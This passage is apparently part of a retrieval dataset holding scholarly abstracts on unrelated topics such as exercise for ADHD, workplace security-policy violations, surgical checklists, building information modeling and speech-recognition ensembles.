"text": "Recent years have seen an expansion of interest in non-pharmacological interventions for attention-deficit/hyperactivity disorder (ADHD). Although considerable treatment development has focused on cognitive training programs, compelling evidence indicates that intense aerobic exercise enhances brain structure and function, and as such, might be beneficial to children with ADHD. This paper reviews evidence for a direct impact of exercise on neural functioning and preliminary evidence that exercise may have positive effects on children with ADHD. At present, data are promising and support the need for further study, but are insufficient to recommend widespread use of such interventions for children with ADHD.",
"title": ""
},
{
"docid": "28b2da27bf62b7989861390a82940d88",
"text": "End users are said to be “the weakest link” in information systems (IS) security management in the workplace. they often knowingly engage in certain insecure uses of IS and violate security policies without malicious intentions. Few studies, however, have examined end user motivation to engage in such behavior. to fill this research gap, in the present study we propose and test empirically a nonmalicious security violation (NMSV) model with data from a survey of end users at work. the results suggest that utilitarian outcomes (relative advantage for job performance, perceived security risk), normative outcomes (workgroup norms), and self-identity outcomes (perceived identity match) are key determinants of end user intentions to engage in NMSVs. In contrast, the influences of attitudes toward security policy and perceived sanctions are not significant. this study makes several significant contributions to research on security-related behavior by (1) highlighting the importance of job performance goals and security risk perceptions on shaping user attitudes, (2) demonstrating the effect of workgroup norms on both user attitudes and behavioral intentions, (3) introducing and testing the effect of perceived identity match on user attitudes and behavioral intentions, and (4) identifying nonlinear relationships between constructs. this study also informs security management practices on the importance of linking security and business objectives, obtaining user buy-in of security measures, and cultivating a culture of secure behavior at local workgroup levels in organizations. KeY words and PHrases: information systems security, nonlinear construct relationships, nonmalicious security violation, perceived identity match, perceived security risk, relative advantage for job performance, workgroup norms. information sYstems (is) securitY Has become a major cHallenGe for organizations thanks to the increasing corporate use of the Internet and, more recently, wireless networks. In the 2010 computer Security Institute (cSI) survey of computer security practitioners in u.S. organizations, more than 41 percent of the respondents reported security incidents [68]. In the united Kingdom, a similar survey found that 45 percent of the participating companies had security incidents in 2008 [37]. While the causes for these security incidents may be difficult to fully identify, it is generally understood that insiders from within organizations pose a major threat to IS security [36, 55]. For example, peer-to-peer file-sharing software installed by employees may cause inadvertent disclosure of sensitive business information over the Internet [41]. Employees writing down passwords on a sticky note or choosing easy-to-guess passwords may risk having their system access privilege be abused by others [98]. the 2010 cSI survey found that nonmalicious insiders are a big issue [68]. according to the survey, more than 14 percent of the respondents reported that nearly all their losses were due to nonmalicious, careless behaviors of insiders. Indeed, end users are often viewed as “the weakest link” in the IS security chain [73], and fundamentally IS security has a “behavioral root” [94]. uNDErStaNDING NONMalIcIOuS SEcurItY VIOlatIONS IN tHE WOrKPlacE 205 a frequently recommended organizational measure for dealing with internal threats posed by end user behavior is security policy [6]. 
For example, a security policy may specify what end users should (or should not) do with organizational IS assets, and it may also spell out the consequences of policy violations. Having a policy in place, however, does not necessarily guarantee security because end users may not always act as prescribed [7]. A practitioner survey found that even if end users were aware of potential security problems related to their actions, many of them did not follow security best practices and continued to engage in behaviors that could open their organizations' IS to serious security risks [62]. For example, the survey found that many employees allowed others to use their computing devices at work despite their awareness of possible security implications. It was also reported that many end users do not follow policies and some of them knowingly violate policies without worry of repercussions [22]. This phenomenon raises an important question: What factors motivate end users to engage in such behaviors? The role of motivation has not been considered seriously in the IS security literature [75] and our understanding of the factors that motivate those undesirable user behaviors is still very limited. To fill this gap, the current study aims to investigate factors that influence end user attitudes and behavior toward organizational IS security. The rest of the paper is organized as follows. In the next section, we review the literature on end user security-related behaviors. We then propose a theoretical model of nonmalicious security violation and develop related hypotheses. This is followed by discussions of our research methods and data analysis. In the final section, we discuss our findings, implications for research and practice, limitations, and further research directions.",
"title": ""
},
{
"docid": "76d4ed8e7692ca88c6b5a70c9954c0bd",
"text": "Custom-tailored products are meant by the products having various sizes and shapes to meet the customer’s different tastes or needs. Thus fabrication of custom-tailored products inherently involves inefficiency. Custom-tailoring shoes are not an exception because corresponding shoe-lasts must be custom-ordered. It would be nice if many template shoe-lasts had been cast in advance, the most similar template was identified automatically from the custom-ordered shoe-last, and only the different portions in the template shoe-last could be machined. To enable this idea, the first step is to derive the geometric models of template shoe-lasts to be cast. Template shoe-lasts can be derived by grouping all the various existing shoe-lasts into manageable number of groups and by uniting all the shoe-lasts in each group such that each template shoe-last for each group barely encloses all the shoe-lasts in the group. For grouping similar shoe-lasts into respective groups, similarity between shoe-lasts should be quantized. Similarity comparison starts with the determination of the closest pose between two shapes in consideration. The closest pose is derived by comparing the ray distances while one shape is virtually rotated with respect to the other. Shape similarity value and overall similarity value calculated from ray distances are also used for grouping. A prototype system based on the proposed methodology has been implemented and applied to grouping of the shoe-lasts of various shapes and sizes and deriving template shoe-lasts. q 2004 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "c7f23ddb60394659cdf48ea4df68ae6b",
"text": "OBJECTIVES\nWe hypothesized reduction of 30 days' in-hospital morbidity, mortality, and length of stay postimplementation of the World Health Organization's Surgical Safety Checklist (SSC).\n\n\nBACKGROUND\nReductions of morbidity and mortality have been reported after SSC implementation in pre-/postdesigned studies without controls. Here, we report a randomized controlled trial of the SSC.\n\n\nMETHODS\nA stepped wedge cluster randomized controlled trial was conducted in 2 hospitals. We examined effects on in-hospital complications registered by International Classification of Diseases, Tenth Revision codes, length of stay, and mortality. The SSC intervention was sequentially rolled out in a random order until all 5 clusters-cardiothoracic, neurosurgery, orthopedic, general, and urologic surgery had received the Checklist. Data were prospectively recorded in control and intervention stages during a 10-month period in 2009-2010.\n\n\nRESULTS\nA total of 2212 control procedures were compared with 2263 SCC procedures. The complication rates decreased from 19.9% to 11.5% (P < 0.001), with absolute risk reduction 8.4 (95% confidence interval, 6.3-10.5) from the control to the SSC stages. Adjusted for possible confounding factors, the SSC effect on complications remained significant with odds ratio 1.95 (95% confidence interval, 1.59-2.40). Mean length of stay decreased by 0.8 days with SCC utilization (95% confidence interval, 0.11-1.43). In-hospital mortality decreased significantly from 1.9% to 0.2% in 1 of the 2 hospitals post-SSC implementation, but the overall reduction (1.6%-1.0%) across hospitals was not significant.\n\n\nCONCLUSIONS\nImplementation of the WHO SSC was associated with robust reduction in morbidity and length of in-hospital stay and some reduction in mortality.",
"title": ""
},
{
"docid": "4729691ffa6e252187a1a663e85fde8b",
"text": "Language models are used in automatic transcription system to resolve ambiguities. This is done by limiting the vocabulary of words that can be recognized as well as estimating the n-gram probability of the words in the given text. In the context of historical documents, a non-unified spelling and the limited amount of written text pose a substantial problem for the selection of the recognizable vocabulary as well as the computation of the word probabilities. In this paper we propose for the transcription of historical Spanish text to keep the corpus for the n-gram limited to a sample of the target text, but expand the vocabulary with words gathered from external resources. We analyze the performance of such a transcription system with different sizes of external vocabularies and demonstrate the applicability and the significant increase in recognition accuracy of using up to 300 thousand external words.",
"title": ""
},
{
"docid": "db5865f8f8701e949a9bb2f41eb97244",
"text": "This paper proposes a method for constructing local image descriptors which efficiently encode texture information and are suitable for histogram based representation of image regions. The method computes a binary code for each pixel by linearly projecting local image patches onto a subspace, whose basis vectors are learnt from natural images via independent component analysis, and by binarizing the coordinates in this basis via thresholding. The length of the binary code string is determined by the number of basis vectors. Image regions can be conveniently represented by histograms of pixels' binary codes. Our method is inspired by other descriptors which produce binary codes, such as local binary pattern and local phase quantization. However, instead of heuristic code constructions, the proposed approach is based on statistics of natural images and this improves its modeling capacity. The experimental results show that our method improves accuracy in texture recognition tasks compared to the state-of-the-art.",
"title": ""
},
{
"docid": "412951e42529d7862cb0bcbaf5bd9f97",
"text": "Wireless Sensor Network is an emerging field which is accomplishing much importance because of its vast contribution in varieties of applications. Wireless Sensor Networks are used to monitor a given field of interest for changes in the environment. Coverage is one of the main active research interests in WSN.In this paper we aim to review the coverage problem In WSN and the strategies that are used in solving coverage problem in WSN.These strategies studied are used during deployment phase of the network. Besides this we also outlined some basic design considerations in coverage of WSN.We also provide a brief summary of various coverage issues and the various approaches for coverage in Sensor network. Keywords— Coverage; Wireless sensor networks: energy efficiency; sensor; area coverage; target Coverage.",
"title": ""
},
{
"docid": "4306bc8a6f1e1bab2ffeb175d7dfeb0f",
"text": "This paper describes the design and evaluation of a method for developing a chat-oriented dialog system by utilizing real human-to-human conversation examples from movie scripts and Twitter conversations. The aim of the proposed method is to build a conversational agent that can interact with users in as natural a fashion as possible, while reducing the time requirement for database design and collection. A number of the challenging design issues we faced are described, including (1) constructing an appropriate dialog corpora from raw movie scripts and Twitter data, and (2) developing an multi domain chat-oriented dialog management system which can retrieve a proper system response based on the current user query. To build a dialog corpus, we propose a unit of conversation called a tri-turn (a trigram conversation turn), as well as extraction and semantic similarity analysis techniques to help ensure that the content extracted from raw movie/drama script files forms appropriate dialog-pair (query-response) examples. The constructed dialog corpora are then utilized in a data-driven dialog management system. Here, various approaches are investigated including example-based (EBDM) and response generation using phrase-based statistical machine translation (SMT). In particular, we use two EBDM: syntactic-semantic similarity retrieval and TF-IDF based cosine similarity retrieval. Experiments are conducted to compare and contrast EBDM and SMT approaches in building a chat-oriented dialog system, and we investigate a combined method that addresses the advantages and disadvantages of both approaches. System performance was evaluated based on objective metrics (semantic similarity and cosine similarity) and human subjective evaluation from a small user study. Experimental results show that the proposed filtering approach effectively improve the performance. Furthermore, the results also show that by combing both EBDM and SMT approaches, we could overcome the shortcomings of each. key words: dialog corpora, response generation, example-based dialog modeling, semantic similarity, cosine similarity, machine translation",
"title": ""
},
{
"docid": "f7c73ca2b6cd6da6fec42076910ed3ec",
"text": "The goal of rating-based recommender systems is to make personalized predictions and recommendations for individual users by leveraging the preferences of a community of users with respect to a collection of items like songs or movies. Recommender systems are often based on intricate statistical models that are estimated from data sets containing a very high proportion of missing ratings. This work describes evidence of a basic incompatibility between the properties of recommender system data sets and the assumptions required for valid estimation and evaluation of statistical models in the presence of missing data. We discuss the implications of this problem and describe extended modelling and evaluation frameworks that attempt to circumvent it. We present prediction and ranking results showing that models developed and tested under these extended frameworks can significantly outperform standard models.",
"title": ""
},
{
"docid": "c56e82343720095e74ec4a50a2190f7f",
"text": "In this paper, we present an accelerometer-based pen-type sensing device and a user-independent hand gesture recognition algorithm. Users can hold the device to perform hand gestures with their preferred handheld styles. Gestures in our system are divided into two types: the basic gesture and the complex gesture, which can be represented as a basic gesture sequence. A dictionary of 24 gestures, including 8 basic gestures and 16 complex gestures, is defined. An effective segmentation algorithm is developed to identify individual basic gesture motion intervals automatically. Through segmentation, each complex gesture is segmented into several basic gestures. Based on the kinematics characteristics of the basic gesture, 25 features are extracted to train the feedforward neural network model. For basic gesture recognition, the input gestures are classified directly by the feedforward neural network classifier. Nevertheless, the input complex gestures go through an additional similarity matching procedure to identify the most similar sequences. The proposed recognition algorithm achieves almost perfect user-dependent and user-independent recognition accuracies for both basic and complex gestures. Experimental results based on 5 subjects, totaling 1600 trajectories, have successfully validated the effectiveness of the feedforward neural network and similarity matching-based gesture recognition algorithm.",
"title": ""
},
{
"docid": "5b0530f94f476754034c92292e02b390",
"text": "Many seemingly simple questions that individual users face in their daily lives may actually require substantial number of computing resources to identify the right answers. For example, a user may want to determine the right thermostat settings for different rooms of a house based on a tolerance range such that the energy consumption and costs can be maximally reduced while still offering comfortable temperatures in the house. Such answers can be determined through simulations. However, some simulation models as in this example are stochastic, which require the execution of a large number of simulation tasks and aggregation of results to ascertain if the outcomes lie within specified confidence intervals. Some other simulation models, such as the study of traffic conditions using simulations may need multiple instances to be executed for a number of different parameters. Cloud computing has opened up new avenues for individuals and organizations Shashank Shekhar shashank.shekhar@vanderbilt.edu Hamzah Abdel-Aziz hamzah.abdelaziz@vanderbilt.edu Michael Walker michael.a.walker.1@vanderbilt.edu Faruk Caglar faruk.caglar@vanderbilt.edu Aniruddha Gokhale a.gokhale@vanderbilt.edu Xenofon Koutsoukos xenonfon.koutsoukos@vanderbilt.edu 1 Department of Electrical Engineering and Computer Science, Vanderbilt University, Nashville, TN 37235, USA with limited resources to obtain answers to problems that hitherto required expensive and computationally-intensive resources. This paper presents SIMaaS, which is a cloudbased Simulation-as-a-Service to address these challenges. We demonstrate how lightweight solutions using Linux containers (e.g., Docker) are better suited to support such services instead of heavyweight hypervisor-based solutions, which are shown to incur substantial overhead in provisioning virtual machines on-demand. Empirical results validating our claims are presented in the context of two",
"title": ""
},
{
"docid": "2f1690d7e1ee4aeca5be28faf80917fa",
"text": "The millimeter wave (mmWave) bands offer the possibility of orders of magnitude greater throughput for fifth-generation (5G) cellular systems. However, since mmWave signals are highly susceptible to blockage, channel quality on any one mmWave link can be extremely intermittent. This paper implements a novel dual connectivity protocol that enables mobile user equipment devices to maintain physical layer connections to 4G and 5G cells simultaneously. A novel uplink control signaling system combined with a local coordinator enables rapid path switching in the event of failures on any one link. This paper provides the first comprehensive end-to-end evaluation of handover mechanisms in mmWave cellular systems. The simulation framework includes detailed measurement-based channel models to realistically capture spatial dynamics of blocking events, as well as the full details of Medium Access Control, Radio Link Control, and transport protocols. Compared with conventional handover mechanisms, this paper reveals significant benefits of the proposed method under several metrics.",
"title": ""
},
{
"docid": "7999684c9cf090c897056b9eb6929af3",
"text": "Ethnically differentiated societies are often regarded as dysfunctional, with poor economic performance and a high risk of violent civil conflict. I argue that this is not well-founded. I distinguish between dominance, in which one group constitutes a majority, and fractionalisation, in which there are many small groups. In terms of overall economic performance, I show that both theoretically and empirically, fractionalisation is normally unproblematic in democracies, although it can be damaging in dictatorships. Fractionalised societies have worse public sector performance, but this is offset by better private sector performance. Societies characterised by dominance are in principle likely to have worse economic performance, but empirically the effect is weak. In terms of the risk of civil war, I show that both theoretically and empirically fractionalisation actually makes societies safer, while dominance increases the risk of conflict. A policy implication is that fractionalised societies are viable and secession should be discouraged. P ub lic D is cl os ur e A ut ho riz ed",
"title": ""
},
{
"docid": "c34d4d0e3dcf52aba737a87877d55f49",
"text": "Building Information Modeling is based on the idea of the continuous use of digital building models throughout the entire lifecycle of a built facility, starting from the early conceptual design and detailed design phases, to the construction phase, and the long phase of operation. BIM significantly improves information flow between stakeholders involved at all stages, resulting in an increase in efficiency by reducing the laborious and error-prone manual re-entering of information that dominates conventional paper-based workflows. Thanks to its many advantages, BIM is already practiced in many construction projects throughout the entire world. However, the fragmented nature of the construction industry still impedes its more widespread use. Government initiatives around the world play an important role in increasing BIM adoption: as the largest client of the construction industry in many countries, the state has the power to significantly change its work practices. This chapter discusses the motivation for applying BIM, offers a detailed definition of BIM along with an overview of typical use cases, describes the common BIM maturity grades and reports on BIM adoption levels in various countries around the globe. A. Borrmann ( ) Chair of Computational Modeling and Simulation, Technical University of Munich, München, Germany e-mail: andre.borrmann@tum.de M. König Chair of Computing in Engineering, Ruhr University Bochum, Bochum, Germany e-mail: koenig@inf.bi.rub.de C. Koch Chair of Intelligent Technical Design, Bauhaus-Universität Weimar, Weimar, Germany e-mail: c.koch@uni-weimar.de J. Beetz Chair of Design Computation, RWTH Aachen University, Aachen, Germany e-mail: j.beetz@caad.arch.rwth-aachen.de © Springer International Publishing AG, part of Springer Nature 2018 A. Borrmann et al. (eds.), Building Information Modeling, https://doi.org/10.1007/978-3-319-92862-3_1 1 2 A. Borrmann et al. 1.1 Building Information Modeling: Why? In the last decade, digitalization has transformed a wide range of industrial sectors, resulting in a tremendous increase in productivity, product quality and product variety. In the Architecture, Engineering, Construction (AEC) industry, digital tools are increasingly adopted for designing, constructing and operating buildings and infrastructure assets. However, the continuous use of digital information along the entire process chain falls significantly behind other industry domains. All too often, valuable information is lost because information is still predominantly handed over in the form of drawings, either as physical printed plots on paper or in a digital but limited format. Such disruptions in the information flow occur across the entire lifecycle of a built facility: in its design, construction and operation phases as well as in the very important handovers between these phases. The planning and realization of built facilities is a complex undertaking involving a wide range of stakeholders from different fields of expertise. For a successful construction project, a continuous reconciliation and intense exchange of information among these stakeholders is necessary. Currently, this typically involves the handover of technical drawings of the construction project in graphical manner in the form of horizontal and vertical sections, views and detail drawings. The software used to create these drawings imitate the centuries-old way of working using a drawing board. However, line drawings cannot be comprehensively understood by computers. 
The information they contain can only be partially interpreted and processed by computational methods. Basing the information flow on drawings alone therefore fails to harness the great potential of information technology for supporting project management and building operation. A key problem is that the consistency of the diverse technical drawings can only be checked manually. This is a potentially massive source of errors, particularly if we take into account that the drawings are typically created by experts from different design disciplines and across multiple companies. Design changes are particularly challenging: if they are not continuously tracked and relayed to all related plans, inconsistencies can easily arise and often remain undiscovered until the actual construction – where they then incur significant extra costs for ad-hoc solutions on site. In conventional practice, design changes are marked only by means of revision clouds in the drawings, which can be hard to detect and ambiguous. The limited information depth of technical drawings also has a significant drawback in that information on the building design cannot be directly used by downstream applications for any kind of analysis, calculation and simulation, but must be re-entered manually which again requires unnecessary additional work and is a further source of errors. The same holds true for the information handover to the building owner after the construction is finished. He must invest considerable effort into extracting the required information for operating the building from the drawings and documents and enter it into a facility management system. [Fig. 1.1: Loss of information caused by disruptions in the digital information flow (based on Eastman et al. 2008).] At each of these information exchange points, data that was once available in digital form is lost and has to be laboriously re-created (Fig. 1.1). This is where Building Information Modeling comes into play. By applying the BIM method, a much more profound use of computer technology in the design, engineering, construction and operation of built facilities is realized. Instead of recording information in drawings, BIM stores, maintains and exchanges information using comprehensive digital representations: the building information models. This approach dramatically improves the coordination of the design activities, the integration of simulations, the setup and control of the construction process, as well as the handover of building information to the operator. By reducing the manual re-entering of data to a minimum and enabling the consequent re-use of digital information, laborious and error-prone work is avoided, which in turn results in an increase in productivity and quality in construction projects. Other industry sectors, such as the automotive industry, have already undergone the transition to digitized, model-based product development and manufacturing which allowed them to achieve significant efficiency gains (Kagermann 2015). 
The Architecture Engineering and Construction (AEC) industry, however, has its own particularly challenging boundary conditions: first and foremost, the process and value creation chain is not controlled by one company, but is dispersed across a large number of enterprises including architectural offices, engineering consultancies, and construction firms. These typically cooperate only for the duration of an individual construction project and not for a longer period of time. Consequently, there are a large number of interfaces in the ad-hoc network of companies where digital information has to be handed over. As these information flows must be supervised and controlled by a central instance, the onus is on the building owner to specify and enforce the use of Building Information Modeling. 1.2 Building Information Modeling: What? A Building Information Model is a comprehensive digital representation of a built facility with great information depth. It typically includes the three-dimensional geometry of the building components at a defined level of detail. In addition, it also comprises non-physical objects, such as spaces and zones, a hierarchical project structure, or schedules. Objects are typically associated with a well-defined set of semantic information, such as the component type, materials, technical properties, or costs, as well as the relationships between the components and other physical or logical entities (Fig. 1.2). The term Building Information Modeling (BIM) consequently describes both the process of creating such digital building models as well as the process of maintaining, using and exchanging them throughout the entire lifetime of the built facility (Fig. 1.3). The US National Building Information Modeling Standard defines BIM as follows (NIBS 2012): Building Information Modeling (BIM) is a digital representation of physical and functional characteristics of a facility. A BIM is a shared knowledge resource for information about a facility forming a reliable basis for decisions during its life-cycle; defined as existing from earliest conception to demolition. A basic premise of BIM is collaboration by different stakeholders at different phases of the life cycle of a facility to insert, extract, update or modify information in the BIM to support and reflect the roles of that stakeholder. [Fig. 1.2: A BIM model comprises both the 3D geometry of each building element as well as a rich set of semantic information provided by attributes and relationships.]",
"title": ""
},
{
"docid": "486417082d921eba9320172a349ee28f",
"text": "Circulating tumor cells (CTCs) are a popular topic in cancer research because they can be obtained by liquid biopsy, a minimally invasive procedure with more sample accessibility than tissue biopsy, to monitor a patient's condition. Over the past decades, CTC research has covered a wide variety of topics such as enumeration, profiling, and correlation between CTC number and patient overall survival. It is important to isolate and enrich CTCs before performing CTC analysis because CTCs in the blood stream are very rare (0⁻10 CTCs/mL of blood). Among the various approaches to separating CTCs, here, we review the research trends in the isolation and analysis of CTCs using microfluidics. Microfluidics provides many attractive advantages for CTC studies such as continuous sample processing to reduce target cell loss and easy integration of various functions into a chip, making \"do-everything-on-a-chip\" possible. However, tumor cells obtained from different sites within a tumor exhibit heterogenetic features. Thus, heterogeneous CTC profiling should be conducted at a single-cell level after isolation to guide the optimal therapeutic path. We describe the studies on single-CTC analysis based on microfluidic devices. Additionally, as a critical concern in CTC studies, we explain the use of CTCs in cancer research, despite their rarity and heterogeneity, compared with other currently emerging circulating biomarkers, including exosomes and cell-free DNA (cfDNA). Finally, the commercialization of products for CTC separation and analysis is discussed.",
"title": ""
},
{
"docid": "6a922e97c878c4d1769e1101f5026cf9",
"text": "Human activities create waste, and it is the way these wastes are handled, stored, collected and disposed of, which can pose risks to the environment and to public health. Where intense human activities concentrate, such as in urban centres, appropriate and safe solid waste management (SWM) are of utmost importance to allow healthy living conditions for the population. This fact has been acknowledged by most governments, however many municipalities are struggling to provide even the most basic services. Typically one to two thirds of the solid waste generated is not collected (World Resources Institute, et al., 1996). As a result, the uncollected waste, which is often also mixed with human and animal excreta, is dumped indiscriminately in the streets and in drains, so contributing to flooding, breeding of insect and rodent vectors and the spread of diseases (UNEP-IETC, 1996). Most of the municipal solid waste in low-income Asian countries which is collected is dumped on land in a more or less uncontrolled manner. Such inadequate waste disposal creates serious environmental problems that affect health of humans and animals and cause serious economic and other welfare losses. The environmental degradation caused by inadequate disposal of waste can be expressed by the contamination of surface and ground water through leachate, soil contamination through direct waste contact or leachate, air pollution by burning of wastes, spreading of diseases by different vectors like birds, insects and rodents, or uncontrolled release of methan by anaerobic decomposition of waste",
"title": ""
},
{
"docid": "0c509f98c65a48c31d32c0c510b4c13f",
"text": "An EM based straight forward design and pattern synthesis technique for series fed microstrip patch array antennas is proposed. An optimization of each antenna element (λ/4-transmission line, λ/2-patch, λ/4-transmission line) of the array is performed separately. By introducing an equivalent circuit along with an EM parameter extraction method, each antenna element can be optimized for its resonance frequency and taper amplitude, so to shape the aperture distribution for the cascaded elements. It will be shown that the array design based on the multiplication of element factor and array factor fails in case of patch width tapering, due to the inconsistency of the element patterns. To overcome this problem a line width tapering is suggested which keeps the element patterns nearly constant while still providing a broad amplitude taper range. A symmetric 10 element antenna array with a Chebyshev tapering (-20dB side lobe level) operating at 5.8 GHz has been designed, compared for the two tapering methods and validated with measurement.",
"title": ""
},
{
"docid": "7a8a98b91680cbc63594cd898c3052c8",
"text": "Policy-based access control is a technology that achieves separation of concerns through evaluating an externalized policy at each access attempt. While this approach has been well-established for request-response applications, it is not supported for database queries of data-driven applications, especially for attribute-based policies. In particular, search operations for such applications involve poor scalability with regard to the data set size for this approach, because they are influenced by dynamic runtime conditions. This paper proposes a scalable application-level middleware solution that performs runtime injection of the appropriate rules into the original search query, so that the result set of the search includes only items to which the subject is entitled. Our evaluation shows that our method scales far better than current state of practice approach that supports policy-based access control.",
"title": ""
},
{
"docid": "c8ae7431c6be27e9b427fd022db03a53",
"text": "Deep learning systems have dramatically improved the accuracy of speech recognition, and various deep architectures and learning methods have been developed with distinct strengths and weaknesses in recent years. How can ensemble learning be applied to these varying deep learning systems to achieve greater recognition accuracy is the focus of this paper. We develop and report linear and log-linear stacking methods for ensemble learning with applications specifically to speechclass posterior probabilities as computed by the convolutional, recurrent, and fully-connected deep neural networks. Convex optimization problems are formulated and solved, with analytical formulas derived for training the ensemble-learning parameters. Experimental results demonstrate a significant increase in phone recognition accuracy after stacking the deep learning subsystems that use different mechanisms for computing high-level, hierarchical features from the raw acoustic signals in speech.",
"title": ""
}
] | scidocsrr |
b36344dedd09ce3caa3fa0cc48a69d5a | Predicting Sufficient Annotation Strength for Interactive Foreground Segmentation | [
{
"docid": "ac740402c3e733af4d690e34e567fabe",
"text": "We address the problem of semantic segmentation: classifying each pixel in an image according to the semantic class it belongs to (e.g. dog, road, car). Most existing methods train from fully supervised images, where each pixel is annotated by a class label. To reduce the annotation effort, recently a few weakly supervised approaches emerged. These require only image labels indicating which classes are present. Although their performance reaches a satisfactory level, there is still a substantial gap between the accuracy of fully and weakly supervised methods. We address this gap with a novel active learning method specifically suited for this setting. We model the problem as a pairwise CRF and cast active learning as finding its most informative nodes. These nodes induce the largest expected change in the overall CRF state, after revealing their true label. Our criterion is equivalent to maximizing an upper-bound on accuracy gain. Experiments on two data-sets show that our method achieves 97% percent of the accuracy of the corresponding fully supervised model, while querying less than 17% of the (super-)pixel labels.",
"title": ""
}
] | [
{
"docid": "7abdd1fc5f2a8c5b7b19a6a30eadad0a",
"text": "This Paper investigate action recognition by using Extreme Gradient Boosting (XGBoost). XGBoost is a supervised classification technique using an ensemble of decision trees. In this study, we also compare the performance of Xboost using another machine learning techniques Support Vector Machine (SVM) and Naive Bayes (NB). The experimental study on the human action dataset shows that XGBoost better as compared to SVM and NB in classification accuracy. Although takes more computational time the XGBoost performs good classification on action recognition.",
"title": ""
},
{
"docid": "bee9fe64d8287da932baea386e583af8",
"text": "Shapelets are discriminative sub-sequences of time series that best predict the target variable. For this reason, shapelet discovery has recently attracted considerable interest within the time-series research community. Currently shapelets are found by evaluating the prediction qualities of numerous candidates extracted from the series segments. In contrast to the state-of-the-art, this paper proposes a novel perspective in terms of learning shapelets. A new mathematical formalization of the task via a classification objective function is proposed and a tailored stochastic gradient learning algorithm is applied. The proposed method enables learning near-to-optimal shapelets directly without the need to try out lots of candidates. Furthermore, our method can learn true top-K shapelets by capturing their interaction. Extensive experimentation demonstrates statistically significant improvement in terms of wins and ranks against 13 baselines over 28 time-series datasets.",
"title": ""
},
{
"docid": "fafbcccd49d324ea45dbe4c341d4c7d9",
"text": "This paper discusses the technical issues that were required to adapt a KUKA Robocoaster for use as a real-time motion simulator. Within this context, the paper addresses the physical modifications and the software control structure that were needed to have a flexible and safe experimental setup. It also addresses the delays and transfer function of the system. The paper is divided into two sections. The first section describes the control and safety structures of the MPI Motion Simulator. The second section shows measurements of latencies and frequency responses of the motion simulator. The results show that the frequency responses of the MPI Motion Simulator compare favorably with high-end Stewart Platforms, and therefore demonstrate the suitability of robot-based motion simulators for flight simulation.",
"title": ""
},
{
"docid": "dafd771706b3d0cfb903e76bb9b35165",
"text": "This study examined how social media use related to sleep quality, self-esteem, anxiety and depression in 467 Scottish adolescents. We measured overall social media use, nighttime-specific social media use, emotional investment in social media, sleep quality, self-esteem and levels of anxiety and depression. Adolescents who used social media more - both overall and at night - and those who were more emotionally invested in social media experienced poorer sleep quality, lower self-esteem and higher levels of anxiety and depression. Nighttime-specific social media use predicted poorer sleep quality after controlling for anxiety, depression and self-esteem. These findings contribute to the growing body of evidence that social media use is related to various aspects of wellbeing in adolescents. In addition, our results indicate that nighttime-specific social media use and emotional investment in social media are two important factors that merit further investigation in relation to adolescent sleep and wellbeing.",
"title": ""
},
{
"docid": "89e11f208c3c96e2b55b00ffbf7da59b",
"text": "In data mining, regression analysis is a computational tool that predicts continuous output variables from a number of independent input variables, by approximating their complex inner relationship. A large number of methods have been successfully proposed, based on various methodologies, including linear regression, support vector regression, neural network, piece-wise regression etc. In terms of piece-wise regression, the existing methods in literature are usually restricted to problems of very small scale, due to their inherent non-linear nature. In this work, a more efficient piece-wise regression method is introduced based on a novel integer linear programming formulation. The proposed method partitions one input variable into multiple mutually exclusive segments, and fits one multivariate linear regression function per segment to minimise the total absolute error. Assuming both the single partition feature and the number of regions are known, the mixed integer linear model is proposed to simultaneously determine the locations of multiple break-points and regression coefficients for each segment. Furthermore, an efficient heuristic procedure is presented to identify the key partition feature and final number of break-points. 7 real world problems covering several application domains have been used to demon∗Corresponding author: Tel.: +442076792563; Fax.: +442073882348 Email addresses: lingjian.yang.10@ucl.ac.uk (Lingjian Yang), s.liu@ucl.ac.uk (Songsong Liu), sophia.tsoka@kcl.ac.uk (Sophia Tsoka), l.papageorgiou@ucl.ac.uk (Lazaros G. Papageorgiou) Preprint submitted to Journal of Expert Systems with Applications August 12, 2015 Accepted Manuscript of a publised work apears its final form in Expert Systems with Applications. To access the final edited and published work see http://dx.doi.org/10.1016/j.eswa.2015.08.034. Open Access under CC-BY-NC-ND user license (http://creativecommons.org/licenses/by-nc-nd/4.0/).",
"title": ""
},
{
"docid": "9b504f633488016fad865dee6fbdf3ef",
"text": "Transmission lines is the important factor of the power system. Transmission and distribution lines has good contribution in the generating unit and consumers to obtain the continuity of electric supply. To economically transfer high power between systems and from control generating field. Transmission line run over hundreds of kilometers to supply electrical power to the consumers. It is a required for industries to detect the faults in the power system as early as possible. “Fault Detection and Auto Line Distribution System With GSM Module” is a automation technique used for fault detection in AC supply and auto sharing of power. The significance undetectable faults is that they represent a serious public safety hazard as well as a risk of arcing ignition of fires. This paper represents under voltage and over current fault detection. It is useful in technology to provide many applications like home, industry etc..",
"title": ""
},
{
"docid": "d931f6f9960e8688c2339a27148efe74",
"text": "Most knowledge on the Web is encoded as natural language text, which is convenient for human users but very difficult for software agents to understand. Even with increased use of XML-encoded information, software agents still need to process the tags and literal symbols using application dependent semantics. The Semantic Web offers an approach in which knowledge can be published by and shared among agents using symbols with a well defined, machine-interpretable semantics. The Semantic Web is a “web of data” in that (i) both ontologies and instance data are published in a distributed fashion; (ii) symbols are either ‘literals’ or universally addressable ‘resources’ (URI references) each of which comes with unique semantics; and (iii) information is semi-structured. The Friend-of-a-Friend (FOAF) project (http://www.foafproject.org/) is a good application of the Semantic Web in which users publish their personal profiles by instantiating the foaf:Personclass and adding various properties drawn from any number of ontologies. The Semantic Web’s distributed nature raises significant data access problems – how can an agent discover, index, search and navigate knowledge on the Semantic Web? Swoogle (Dinget al. 2004) was developed to facilitate webscale semantic web data access by providing these services to both human and software agents. It focuses on two levels of knowledge granularity: URI based semantic web vocabulary andsemantic web documents (SWDs), i.e., RDF and OWL documents encoded in XML, NTriples or N3. Figure 1 shows Swoogle’s architecture. The discovery component automatically discovers and revisits SWDs using a set of integrated web crawlers. The digest component computes metadata for SWDs and semantic web terms (SWTs) as well as identifies relations among them, e.g., “an SWD instantiates an SWT class”, and “an SWT class is the domain of an SWT property”. The analysiscomponent uses cached SWDs and their metadata to derive analytical reports, such as classifying ontologies among SWDs and ranking SWDs by their importance. The s rvicecomponent sup-",
"title": ""
},
{
"docid": "6c5969169086a3b412e27f630c054c60",
